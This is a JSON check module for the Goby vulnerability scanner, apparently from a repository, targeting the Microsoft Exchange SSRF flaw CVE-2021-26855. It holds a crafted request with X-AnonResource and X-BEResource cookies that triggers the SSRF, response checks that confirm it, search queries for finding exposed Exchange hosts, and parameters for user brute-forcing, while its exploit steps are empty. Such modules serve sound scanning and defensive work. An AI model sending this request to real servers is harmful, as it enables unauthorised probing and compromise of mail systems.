Goby/json/Microsoft-Exchange-Server-S...

89 lines
2.3 KiB
JSON

{
"Name": "Microsoft Exchange Server SSRF (CVE-2021-26855)",
"Description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.",
"Product": "Exchange Server",
"Homepage": "http://www.exchangecn.com/",
"DisclosureDate": "2021-03-02",
"Author": "desktop-n7qn2h0\\go0p",
"FofaQuery": "app=\"Microsoft-Exchange\"",
"GobyQuery": "app=\"Microsoft-Exchange\"",
"Level": "2",
"Impact": "",
"Recommendation": "",
"References": null,
"RealReferences": [
"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855",
"https://nvd.nist.gov/vuln/detail/CVE-2021-26855",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855"
],
"HasExp": true,
"ExpParams": [
{
"name": "AttackType",
"type": "select",
"value": "Mailing_List,Brute_User"
},{
"name": "Mailing_List",
"type": "input",
"value": "administrator",
"show": "AttackType=Mailing_List"
},
{
"name": "Brute_User",
"type": "select",
"value": "Common user name",
"show": "AttackType=Mailing_List"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"data": "",
"data_type": "text",
"header": {"Cookie": "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;"},
"follow_redirect": false,
"method": "GET",
"uri": "/owa/auth/x.js"
},
"ResponseTest": {
"checks": [
{
"bz": "",
"operation": "==",
"type": "item",
"value": "500",
"variable": "$code"
},
{
"bz": "",
"operation": "contains",
"type": "item",
"value": "NegotiateSecurityContext",
"variable": "$body"
}
],
"operation": "AND",
"type": "group"
}
}
],
"ExploitSteps": null,
"Tags": ["ssrf"],
"CVEIDs": [
"CVE-2021-26855"
],
"CVSSScore": "N/A",
"AttackSurfaces": {
"Application": ["Microsoft-Exchange"],
"Support": null,
"Service": null,
"System": null,
"Hardware": null
},
"Disable": false
}